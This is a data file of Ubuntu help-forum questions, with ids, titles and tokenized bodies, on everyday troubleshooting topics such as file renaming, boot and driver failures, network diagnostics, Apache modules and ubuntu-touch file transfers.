341603	need help mass renaming files using command line that contain a certain string	i have about 200 files that are named like this : 01_-_back_alley_uproar.avi 01_-_bad_luck_cat.avi 01_-_beep_beep.avi 02_-_broomstick_bunny.avi 02_-_bunker_hill.avi and so on . i would like to rename them all to look like this : back alley uproar.avi bad luck cat.avi beep beep.avi broomstick bunny bunker hill and so on ... i need to use the command line as i am connected via ssh via winscp from a windows box to get to my ubuntu server containing these files . thanks in advance .
341605	blank screen after updating from 12.04 to 12.10	after installing ubuntu 12.04 , i upgraded to 12.10 . when the computer restarted , i selected the ubuntu os , then the screen went purple for a second or so , and then went blank i do n't know how to proceed . my comp specs : windows 7 32-bit intel ( r ) core ( tm ) i3-3210 cpu @ 3.20 ghz ram : 4gb graphics card : intel ( r ) hd graphics 2500
341609	internet not working on ubuntu 13.04	suddenly internet stopped working on my ubuntu 13.04 system . first i tried restarting router but it did n't worked . then i tried internet on win 7 it is working fine . but it is not working on ubuntu , i have tried both lan/wifi but they are not working . below i have pasted all the information i gathered : iwconfig lo no wireless extensions . eth0 no wireless extensions . eth1 ieee 802.11abg essid : off/any mode : managed access point : not-associated retry long limit:7 rts thr : off fragment thr : off power management : off ifconfig eth0 link encap : ethernet hwaddr 00:21:9b : f3 : c7:39 inet addr:192.168.1.2 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :221:9bff : fef3 : c739/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1298 errors:0 dropped:0 overruns:0 frame:0 tx packets:1429 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:357699 ( 357.6 kb ) tx bytes:150796 ( 150.7 kb ) interrupt:16 eth1 link encap : ethernet hwaddr 00:23:4d:4d:4a:0b inet6 addr : fe80 : :223:4dff : fe4d:4a0b/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 base address:0xc000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1916 errors:0 dropped:0 overruns:0 frame:0 tx packets:1916 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:133301 ( 133.3 kb ) tx bytes:133301 ( 133.3 kb ) ping 8.8.8.8 -c 4 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . 64 bytes from 8.8.8.8 : icmp_req=1 ttl=56 time=28.1 ms 64 bytes from 8.8.8.8 : icmp_req=2 ttl=56 time=27.4 ms 64 bytes from 8.8.8.8 : icmp_req=3 ttl=56 time=27.9 ms 64 bytes from 8.8.8.8 : icmp_req=4 ttl=56 time=36.4 ms -- - 8.8.8.8 ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 3004ms rtt min/avg/max/mdev = 27.436/29.997/36.444/3.731 ms ping www.google.com -c 4 ping : unknown host www.google.com ping 192.168.1.1 -c 4 ping 192.168.1.1 ( 192.168.1.1 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.1.1 : icmp_req=1 ttl=64 time=0.610 ms 64 bytes from 192.168.1.1 : icmp_req=2 ttl=64 time=0.588 ms 64 bytes from 192.168.1.1 : icmp_req=3 ttl=64 time=0.554 ms 64 bytes from 192.168.1.1 : icmp_req=4 ttl=64 time=0.575 ms -- - 192.168.1.1 ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 2997ms rtt min/avg/max/mdev = 0.554/0.581/0.610/0.035 ms sudo apt-get update err http : //archive.scrapy.org precise release.gpg something wicked happened resolving 'archive.scrapy.org : http ' ( -11 - system error ) err http : //archive.canonical.com raring release.gpg something wicked happened resolving 'archive.canonical.com : http ' ( -11 - system error ) err http : //ppa.launchpad.net raring release.gpg something wicked happened resolving 'ppa.launchpad.net : http ' ( -11 - system error ) sudo lshw ubuntu description : portable computer product : inspiron 1525 ( ) vendor : dell inc. serial : f7vh2bs width : 32 bits capabilities : smbios-2.4 dmi-2.4 configuration : boot=normal chassis=portable uuid=44454c4c-3700-1056-8048-c6c04f324253 *-core description : motherboard product : 0u990c vendor : dell inc. physical id : 0 serial : .f7vh2bs.cn7016689u0nzw . *-firmware description : bios vendor : dell inc. physical id : 0 version : a17 date : 10/27/2009 size : 64kib capacity : 1984kib capabilities : isa pci pcmcia pnp upgrade shadowing cdboot bootselect int13floppy720 int5printscreen int9keyboard int14serial int17printer int10video acpi usb agp smartbattery biosbootspecification netboot *-cpu description : cpu product : intel ( r ) core ( tm ) 2 duo cpu t5800 @ 2.00ghz vendor : intel corp. physical id : 400 bus info : cpu @ 0 version : 6.15.13 serial : 0000-06fd-0000-0000-0000-0000 slot : microprocessor size : 800mhz capacity : 2ghz width : 64 bits clock : 200mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx constant_tsc arch_perfmon pebs bts aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm lahf_lm dtherm cpufreq configuration : cores=2 enabledcores=2 id=0 threads=2 *-cache:0 description : l1 cache physical id : 700 size : 32kib capacity : 32kib capabilities : internal write-back data *-cache:1 description : l2 cache physical id : 701 size : 2mib capacity : 2mib clock : 66mhz ( 15.0ns ) capabilities : pipeline-burst internal varies unified *-logicalcpu:0 description : logical cpu physical id : 0.1 width : 64 bits capabilities : logical *-logicalcpu:1 description : logical cpu physical id : 0.2 width : 64 bits capabilities : logical *-memory description : system memory physical id : 1000 slot : system board or motherboard size : 2gib *-bank:0 description : dimm ddr synchronous 800 mhz ( 1.2 ns ) product : hymp112s64cp6-s6 vendor : hynix semiconductor ( hyundai electronics ) physical id : 0 serial : 04008132 slot : dimm_a size : 1gib width : 64 bits clock : 800mhz ( 1.2ns ) *-bank:1 description : dimm ddr synchronous 800 mhz ( 1.2 ns ) product : hymp112s64cp6-s6 vendor : hynix semiconductor ( hyundai electronics ) physical id : 1 serial : 04008054 slot : dimm_b size : 1gib width : 64 bits clock : 800mhz ( 1.2ns ) *-pci description : host bridge product : mobile pm965/gm965/gl960 memory controller hub vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 0c width : 32 bits clock : 33mhz configuration : driver=agpgart-intel resources : irq:0 *-display:0 description : vga compatible controller product : mobile gm965/gl960 integrated graphics controller ( primary ) vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 0c width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:45 memory : fea00000-feafffff memory : e0000000-efffffff ioport : eff8 ( size=8 ) *-display:1 unclaimed description : display controller product : mobile gm965/gl960 integrated graphics controller ( secondary ) vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 0c width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory : feb00000-febfffff *-usb:0 description : usb controller product : 82801h ( ich8 family ) usb uhci controller # 4 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:20 ioport:6f20 ( size=32 ) *-usb:1 description : usb controller product : 82801h ( ich8 family ) usb uhci controller # 5 vendor : intel corporation physical id : 1a.1 bus info : pci @ 0000:00:1a.1 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:21 ioport:6f00 ( size=32 ) *-usb:2 description : usb controller product : 82801h ( ich8 family ) usb2 ehci controller # 2 vendor : intel corporation physical id : 1a.7 bus info : pci @ 0000:00:1a.7 version : 02 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:22 memory : fed1c400-fed1c7ff *-multimedia description : audio device product : 82801h ( ich8 family ) hd audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 02 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:46 memory : fe9fc000-fe9fffff *-pci:0 description : pci bridge product : 82801h ( ich8 family ) pci express port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : 02 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport : d000 ( size=4096 ) memory : fe800000-fe8fffff ioport:80000000 ( size=2097152 ) *-network description : ethernet interface product : 88e8040 pci-e fast ethernet controller vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 12 serial : 00:21:9b : f3 : c7:39 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sky2 driverversion=1.30 duplex=full ip=192.168.1.2 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:44 memory : fe8fc000-fe8fffff ioport : de00 ( size=256 ) *-pci:1 description : pci bridge product : 82801h ( ich8 family ) pci express port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : 02 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:41 ioport:2000 ( size=4096 ) memory : fe700000-fe7fffff ioport:80200000 ( size=2097152 ) *-network description : wireless interface product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0b:00.0 logical name : eth1 version : 01 serial : 00:23:4d:4d:4a:0b width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : fe7fc000-fe7fffff *-pci:2 description : pci bridge product : 82801h ( ich8 family ) pci express port 5 vendor : intel corporation physical id : 1c.4 bus info : pci @ 0000:00:1c.4 version : 02 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:42 ioport : c000 ( size=4096 ) memory : fe400000-fe6fffff ioport : f0000000 ( size=2097152 ) *-usb:3 description : usb controller product : 82801h ( ich8 family ) usb uhci controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:20 ioport:6f80 ( size=32 ) *-usb:4 description : usb controller product : 82801h ( ich8 family ) usb uhci controller # 2 vendor : intel corporation physical id : 1d.1 bus info : pci @ 0000:00:1d.1 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:21 ioport:6f60 ( size=32 ) *-usb:5 description : usb controller product : 82801h ( ich8 family ) usb uhci controller # 3 vendor : intel corporation physical id : 1d.2 bus info : pci @ 0000:00:1d.2 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:22 ioport:6f40 ( size=32 ) *-usb:6 description : usb controller product : 82801h ( ich8 family ) usb2 ehci controller # 1 vendor : intel corporation physical id : 1d.7 bus info : pci @ 0000:00:1d.7 version : 02 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:20 memory : fed1c000-fed1c3ff *-pci:3 description : pci bridge product : 82801 mobile pci bridge vendor : intel corporation physical id : 1e bus info : pci @ 0000:00:1e.0 version : f2 width : 32 bits clock : 33mhz capabilities : pci subtractive_decode bus_master cap_list resources : memory : fe300000-fe3fffff *-firewire description : firewire ( ieee 1394 ) product : r5c832 ieee 1394 controller vendor : ricoh co ltd physical id : 9 bus info : pci @ 0000:02:09.0 version : 05 width : 32 bits clock : 33mhz capabilities : pm ohci bus_master cap_list configuration : driver=firewire_ohci latency=64 maxlatency=4 mingnt=2 resources : irq:16 memory : fe3ff800-fe3fffff *-generic:0 description : sd host controller product : r5c822 sd/sdio/mmc/ms/mspro host adapter vendor : ricoh co ltd physical id : 9.1 bus info : pci @ 0000:02:09.1 version : 22 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : driver=sdhci-pci latency=64 resources : irq:18 memory : fe3ff400-fe3ff4ff *-generic:1 description : system peripheral product : r5c592 memory stick bus host adapter vendor : ricoh co ltd physical id : 9.2 bus info : pci @ 0000:02:09.2 version : 12 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : driver=r592 latency=64 resources : irq:18 memory : fe3ff600-fe3ff6ff *-generic:2 description : system peripheral product : xd-picture card controller vendor : ricoh co ltd physical id : 9.3 bus info : pci @ 0000:02:09.3 version : 12 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : driver=r852 latency=64 resources : irq:18 memory : fe3ff700-fe3ff7ff *-isa description : isa bridge product : 82801hm ( ich8m ) lpc interface controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 02 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : driver=lpc_ich latency=0 resources : irq:0 *-ide description : ide interface product : 82801hm/hem ( ich8m/ich8m-e ) ide controller vendor : intel corporation physical id : 1f.1 bus info : pci @ 0000:00:1f.1 version : 02 width : 32 bits clock : 33mhz capabilities : ide bus_master configuration : driver=ata_piix latency=0 resources : irq:16 ioport:1f0 ( size=8 ) ioport:3f6 ioport:170 ( size=8 ) ioport:376 ioport:6fa0 ( size=16 ) *-storage description : sata controller product : 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ahci mode ] vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 version : 02 width : 32 bits clock : 66mhz capabilities : storage msi pm ahci_1.0 bus_master cap_list configuration : driver=ahci latency=0 resources : irq:43 ioport:6eb0 ( size=8 ) ioport:6eb8 ( size=4 ) ioport:6ec0 ( size=8 ) ioport:6ec8 ( size=4 ) ioport:6ee0 ( size=32 ) memory : fe9fb800-fe9fbfff *-serial unclaimed description : smbus product : 82801h ( ich8 family ) smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 02 width : 32 bits clock : 33mhz configuration : latency=0 resources : memory : fe9fb700-fe9fb7ff ioport:10c0 ( size=32 ) *-scsi:0 physical id : 1 logical name : scsi0 capabilities : emulated *-disk description : ata disk product : wdc wd1600bevt-7 vendor : western digital physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 11.0 serial : wd-wxe808sv0853 size : 149gib ( 160gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=512 signature=70000000 *-volume:0 description : windows fat volume vendor : dell 8.0 physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 version : fat16 serial : 07d8-0a13 size : 117mib capacity : 117mib capabilities : primary fat initialized configuration : fats=2 filesystem=fat label=dellutility *-volume:1 description : windows ntfs volume physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 version : 3.1 serial : 5c89718e-6480-cd49-b364-ef9b33d13654 size : 10216mib capacity : 10239mib capabilities : primary ntfs initialized configuration : clustersize=4096 created=2013-04-03 14:01:34 filesystem=ntfs label=new volume state=clean *-volume:2 description : windows ntfs volume physical id : 3 bus info : scsi @ 0:0.0.0,3 logical name : /dev/sda3 version : 3.1 serial : 0c39-c2bc size : 78mib capacity : 100mib capabilities : primary bootable ntfs initialized configuration : clustersize=4096 created=2012-06-25 16:12:32 filesystem=ntfs label=system reserved state=clean *-volume:3 description : windows ntfs volume physical id : 4 bus info : scsi @ 0:0.0.0,4 logical name : /dev/sda4 logical name : /host version : 3.1 serial : 40c0874d-f90c-a443-b48e-9cf8fe425595 size : 138gib capacity : 138gib capabilities : primary ntfs initialized configuration : clustersize=4096 created=2012-06-25 16:12:47 filesystem=ntfs mount.fstype=fuseblk mount.options=rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , allow_other , blksize=4096 state=mounted *-scsi:1 physical id : 2 logical name : scsi3 capabilities : emulated *-cdrom description : dvd-ram writer product : dvd+-rw gsa-t21n vendor : hl-dt-st physical id : 0.0.0 bus info : scsi @ 3:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : a1r1 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=open *-battery product : dell x409g8a physical id : 1 slot : sys . battery bay capacity : 37000mwh configuration : voltage=11.1v can someone please help me
341612	how to fix sudo after “chmod -r 777 /var” ?	i executed chmod 777 /var and now ubuntu wo n't start , can anyone tell me what i did wrong ? and if there is a way of going back ?
341613	difference between phablet-flash cdimage-touch and phablet-flash ubuntu-system ?	i always used the method : phablet-flash cdimage-touch for updating to the newest version . but there is also the possibility to use : phablet-flash ubuntu-system . so my question is : where is the difference between `` cdimage '' and `` ubuntu-system '' ? are there any pros or cons ?
341620	after installing ubuntu boot screen no cable connection !	i was using windows 7 . later , using usb bootable ubuntu i installed ubuntu on newly created new partition table . ext4 format . sda1 - ubuntu / sda2 - swap base sda3 - logical drive /data sd4 - logical drive /backup after installation is complete , when i remove my usb drive and restart the machine . i see this error on boot screen . intel undi pxe 2.0 ... check cable connection ! after that screen , it shows me f12 menu , if i select any of them same thing again . but if i try to install ubuntu again , it works . but after installation same issue again . i have now converted my hdd to mbr with partition wizard bootable usb . problem persists , even after installing again . my laptop specs : lenovo g580 intel i5 4gb ram 500gb hdd intel 4000hd gfx
341621	removing spideroak	spideroak removing faq says that i need to delete the ~/.spideroak folder . i have uninstalled the application but i do n't want to go deleting things and mess something up . can someone please give a set by step guide on how to do this ?
341622	can i backup ubuntu windows installation ?	i have ubuntu-11.10-desktop-i386.iso and wanted to install it within windows . i found out the ubuntu recognized my wireless device without even installing any drivers , which i did n't see in linux mint 15 , so i plan to install this ubuntu-11.10-desktop-i386 within windows and update it quickly and make a backup of this ubuntu . is it possible to do so ? since this will be installed within windows . any suggestions are welcome .
341623	does file /etc/apt/sources.list.apt-clone exist and if so , what is the difference to /etc/apt/sources.list ?	i know that /etc/apt/sources.list is used to tell the apt ubuntu/debian package system about the packages it should use . this is quite clear already . but i have seen that there is a file /etc/apt/sources.list.apt-clone and i was wondering what it is ? is this file only present on my system ( which is 12.04 precise ) ? it seems indeed to be a copy of the file /etc/apt/sources.list . in case the file exists in all 12.04 versions , what purpose does it serve ?
341628	how to extract tar.7z files from command line ?	is there a way to extract files of tar.7z format using command line tools in ubuntu ?
341629	is it true that chromium uses more cpu than firefox ?	hi i was a firefox user but i switched to chromium a while ago and i feel like chrome uses uses more cpu browsing the web than firefox ... i have this psensor app installed on my ubuntu 12.10 which i constantly check and i can tell i feel like ff is better for the sake of my laptop because i spend a lot of time browsing the web . even though i disabled loading flash and plugins while browsing the web but i still feel like chromium is overusing the cpu ... ` for the record i do n't have any heavy plugins so it 's not the plugins which wastes cpu ... i heard that chromium is not officially supported that 's why it may have a poor performance compared to firefox although i get every available chromium update ... should i switch back to ff ? i 'm hooked with chromeuim deeply , that wo n't be near anything easy ...
341631	vlc does not prevent backlight from turning off on battery	on kubuntu 12.04 i have noticed that vlc does not prevent my backlight from dimming when watching a movie in fullscreen on battery . i have the following enabled in the advanced preferences : inhibit the power management daemon during playback which works to some extent since the laptop does not go into suspend/hibernation . however , the screen still dims and i have to stay moving the mouse to make it bright again . dragon player does not suffer from this issue so i assume its a problem with vlc . does anyone have an idea of what i need to do to fix this ?
341642	why is my hard drive recognised as removable ?	i have 2 samsung 840s in my computer , one boot and the other expanded storage but ubuntu recognizes the second as a removable drive but i want them both to be recognised as internal drives , how do i get it to mount as an internal drive ?
341649	kubuntu - what 's the best smplayer configuration for best quality in hd movies ( mkv )	i have ubuntu x64 13.04 with kde 4.11 and smplayer v0.8.6 and the last mplayer version from ppa . i have ati video card hd6870 msi with fglrx driver v13.4 . my kde settings are : composition mode : opengl 3.1 graphic system qt : raster scaling mode : precise vsync : auto so what 's the best configuration for quality over performace in smplayer according to my system specs ? for example what do i have to set for the following options ? enable postprocessing by default and postprocessing quality output driver deinterlacing method software equalizer direct rendering double buffering draw video using slices threads for decoding ( mpeg-1/2 and h.264 only loop filter use coreavc thanks
341656	matlab installation problem from sotware centre on ubuntu 13.04	i have installed the software from the software center then it was a window prompting to enter the path of the executables files of the matlab tell me from where the files have been installed and how can i get the path of the files
341657	how to hide all the items on desktop	how to hide all the items on desktop ? i have set up a beautiful desktop background and i want to see the full desktop sometimes . any shortcut ?
341659	`` sudo apt-get update '' keeps hanging at the same point	since today i have a problem updating . every time i try sudo apt-get update the process hangs at the exact same point . ... ign http : //de.archive.ubuntu.com raring-backports/main translation-de_de ign http : //de.archive.ubuntu.com raring-backports/main translation-de ign http : //de.archive.ubuntu.com raring-backports/multiverse translation-de_de ign http : //de.archive.ubuntu.com raring-backports/multiverse translation-de ign http : //de.archive.ubuntu.com raring-backports/restricted translation-de_de ign http : //de.archive.ubuntu.com raring-backports/restricted translation-de ign http : //de.archive.ubuntu.com raring-backports/universe translation-de_de ign http : //de.archive.ubuntu.com raring-backports/universe translation-de 100 % [ wird verarbeitet ] i assume it is this line : ign http : //de.archive.ubuntu.com raring-backports/universe translation-de i do not what to do . i am running ubuntu 13.04 64 bit , obviously german ; ) edit : it did work ( though very slowly ) when i disabled raring-backports - so this may be the source of the problem . again , it is very slow when it comes to `` translation-de '' - needs minutes until it contnues ... mabe this is the true problem ...
341661	what application do the same what shazam or soundhound does on android ?	what application do the same what shazam or soundhound does on android ? shazam for windows and macos , i do n't like wine , plus it is commercial . you can verify about 2-5 songs and must pay to continue . soundhound - closely mobile os 's app . what kind of application for linux/ubuntu can do the same ? $ soundhound song.mp3 the beatles - let it be - imdb index # i found this question but answers are about mp3 tag only : application for finding song names
341662	libreoffice ppa version has incompabilities with unity , how to solve them ?	i have intermittent problems running libreoffice 4.1.1.2 ( from the ppa ) on precise 12.04.03 . sometimes when i am either opening or closing the document , the screen flashes and the unity panel disappears . i am unable to alt-tab between windows and sometimes my keyboard is not responsive ( although alt-fx is able to get me to a console login ) . if i keep a terminal window open , i am able to close windows down using my mouse and restart unity from the command line ( if my keyboard is responsive ) . any ideas on a fix ? i purged the libreoffice-gtk package as per suggestions in other posts , to no effect . in addition , when i run unity from the terminal , the crash generates these messages ( which is meaningless to me , but may help others ) : warn 2013-09-05 11:41:09 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application0xbf9060 error 2013-09-05 11:41:11 unity.glib-gobject < unknown > :0 g_object_set_qdata : assertion `g_is_object ( object ) ' failed warn 2013-09-05 11:42:06 unity < unknown > :0 failed to fetch path : no such interface `org.ayatana.bamf.application ' on object at path /org/ayatana/bamf/application0xb8aa70 warn 2013-09-05 11:42:06 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application0xb8aa70 warn 2013-09-05 11:42:06 unity < unknown > :0 failed to fetch path : no such interface `org.ayatana.bamf.application ' on object at path /org/ayatana/bamf/application0xb8ae80 warn 2013-09-05 11:42:06 unity.gdk < unknown > :0 compiz : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . update 2 : i suspect my issue is related to this bug , as i un-maximised the screen and have not had a problem . no workaround available yet , it seems : https : //bugs.launchpad.net/ubuntu/+source/libreoffice/+bug/829384
341666	disable wacom pen 12.04	i am using a hp tc4400 running on windows 8 and ubuntu 12.04 . my wacom tablet is problematic and automatically shifts ( and clicks ! ) to a corner of the screen . this is solved in my windows os by disabling the driver in device manager . i was wondering if it was possible in ubuntu . i have tried xwacom to disable device but in vain . any help is appreciated . thanks in advance . ↳ serial wacom tablet stylus id=12 [ slave pointer ( 2 ) ] ↳ serial wacom tablet eraser id=14 [ slave pointer ( 2 ) ] # ! /bin/bash xinput –set-prop 12 “device enabled” 0 xinput –set-prop 14 “device enabled” 0
341668	did a re-install after installing windows and now i am getting a kernel panic	my windows was showing problems so i restored it to the factory version . once i did that my laptop would directly boot to windows . so i thought it must have formatted the ubuntu partition as well . so i went ahead and reinstalled 13.04 via a live cd.it was successful . post this re-install i can not boot into ubuntu anymore as there is a kernel panic : not syncing attempted to kill init i dont know how to correct this problem . please help p.s . - i am novice user and i have just started using ubuntu ( well almost ) edit : ijust did a memory test as well , and it said `` pass complete no errors . ''
341672	ubuntu 12.04 , video freezes	i 've just installed ubuntu 12.04 on my laptop ( asus x53sd ) . there was already windows 7 professional installed , so i created new partitions and everything worked fine during the installation . ( i installed windows and ubuntu on the same day ) . my laptop has 2 graphic cards : nvidia geforce 610m and intel ( r ) hd graphics family . i 've installed the additional driver for nvidia which was recommended after the installation of the ubuntu os ( which is nvidia-319 ) . for the intel card , no drivers were suggested . then suddenly , when working on the linux environment , my screen started to freeze , while the laptop itself was still running ( i noticed that since i was copying files from an external hard disk , i could hear it working and after i restarted the laptop , the files were all copied ) . i 've tried several possible solutions : change the driver to another possible one which was suggested ( the previous version of the nvidia 319 ) ; install the driver manually , downloading it from the geforce website . this solution did n't work because i was not able to install it . download several updates which were present but still did n't make my laptop working well ; upgrade the system to ubuntu 12.10 . in this case , if i tried to change the driver , then i was no more able to log on my desktop , since my laptop was said to work in the `` low graphics mode '' . if i left as it was , it kept on freezing . luckily i have an instant on/off button which allows me to switch off and on the laptop in less than 10 seconds , without losing my work , but it is still pretty annoying when the screen freezes . all these problems are not present when i work on the windows partition . any suggestions ? thanks , lorenzo
341680	compiz burn effect in ubuntu 13.04	i have a problem with compiz . i installed compiz setting manager on ubuntu 13.04 , also installed compiz main and extra fusion plug-ins . but i ca n't enable 3d windows and cube reflection effects and burn effects . the check boxes of these plug-ins does n't work .
341683	installing ubuntu-linux on virtualbox ( virtual machine )	i downloaded virtualbox for mac and the ubuntu linux iso . i have tried to install the iso on a virtual machine i set up using virtualbox . i keep getting this message , [ 7.409131 ] kernel panic -not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) [ 7.409989 ] atkbd serio0 : spurious ack on isa0060/serio0 . some program might be trying to access hardware directly . what can i do to resolve it ?
341684	how to load the modules for apache2 ?	i want to load some modules for proxy configuration . i have the modules installed under /etc/apache2/mods-available/xxx how do i load them into /etc/apache2/mods-enabled/xxx ? in other words , in which configuration should this be placed ? loadmodule proxy_module /usr/lib/apache2/modules/mod_proxy.so loadmodule proxy_http_module /usr/lib/apache2/modules/mod_proxy_http.so
341685	what to do if the installer ca n't detect your windows install ?	i have been talking to a long time xp user in another forum . they have been playing with wubi but with the inevitable demise of xp next year , they want to move to a proper install . they have deleted their wubi install but when they booted to the livecd , the installer could n't find windows . they bailed . now , i have n't done any dual-booting in a very , very long time but i understand what the installer is supposed to do if it finds windows . it resizes partitions nicely and sets up grub with a windows option . i know both of these things can be done manually but they can be quite daunting tasks and i 'd like to avoid telling somebody of unknown ability to do them if possible . is it possible to `` fix '' windows sufficiently to get the installer to find it ?
341690	ethernet *-network disabled	just installed ubuntu server 12.04 on my laptop . the desktop version always had driver issues but only with wifi not the ethernet , and i could just hard wire and install the proprietary drivers manually and it would work . but on my installed server i get no ethernet connectivity . ifconfig only shows lo for loopback an not eth0 like usual . lshw -c network *-network disabled description : ethernet interface i tried ifconfig up up : error fetching interface information : device unknown then lsmod showed that by b34 and b44 modules are there but they were showing 0 in the column for in use and no programs were using them , but b44 was using another program . ======================= update 1 : lspci -nnk | grep -i -a2 net 05:00.0 network controller 0280 broadcom corporation , bcm4311 802.11b/g wlan 14e4:4311 rev 01 subsystem : dell wireless 1390wlan mini card 102b:007 kernel driver in use b43-pic-brige kernel module : ssb 08:00.0 ethernet controller 0200 broadcom corporation , bcm4401-b0 100base-tx 14e4:170c rev 02 subsystem dell device 102b01f5 kernel driver in use b44 thank you .
341695	how to transfer data to ubuntu-touch	if you want to transfer data ( for example pictures ) from your ubuntu-touch device , you have to type this in the terminal : '' adb pull /home/phablet/pictures/ '' this works for all kinds of data to transfer it to the pc . but how can i transfer data from my pc to the ubuntu-touch device ? thanks !
341699	how to get back top panel after it disappears while using firefox ?	my web pages are being displayed without the mozilla firefox borders , and i cant view the applications , places and system bar on the top . i accidentally pressed some button and i cant get the default settings back . can anyone help me out with this ?
341705	deleting windows after installing ubuntu	i installed ubuntu 12.04 on my laptop using the windows interface installer and it works just fine but now i want to get rid of windows 7 permanently because it is simply a burden and uses up 50gb of disk space and is virtually usless to me now . since this type of installation uses windows as the `` host '' os if there is any problem with windows in the future i 'm afraid that may compromise the functioning of ubuntu . is it possible to do this while ubuntu is still on my primary drive ? i have all my data backed up on drive d : \ so can i format only that part of c : \ that has windows on it leaving ubuntu intact or do i have to format the entire c : \ drive ?
341706	how can i sort images from terminal ?	i have a lots of images with timestamp : cloudcam-20130825t115716z.jpg in the same folder i would like to create a folder named after the date ( 20130825 ) and move all the images to this folder . is there an easy way to do this ?
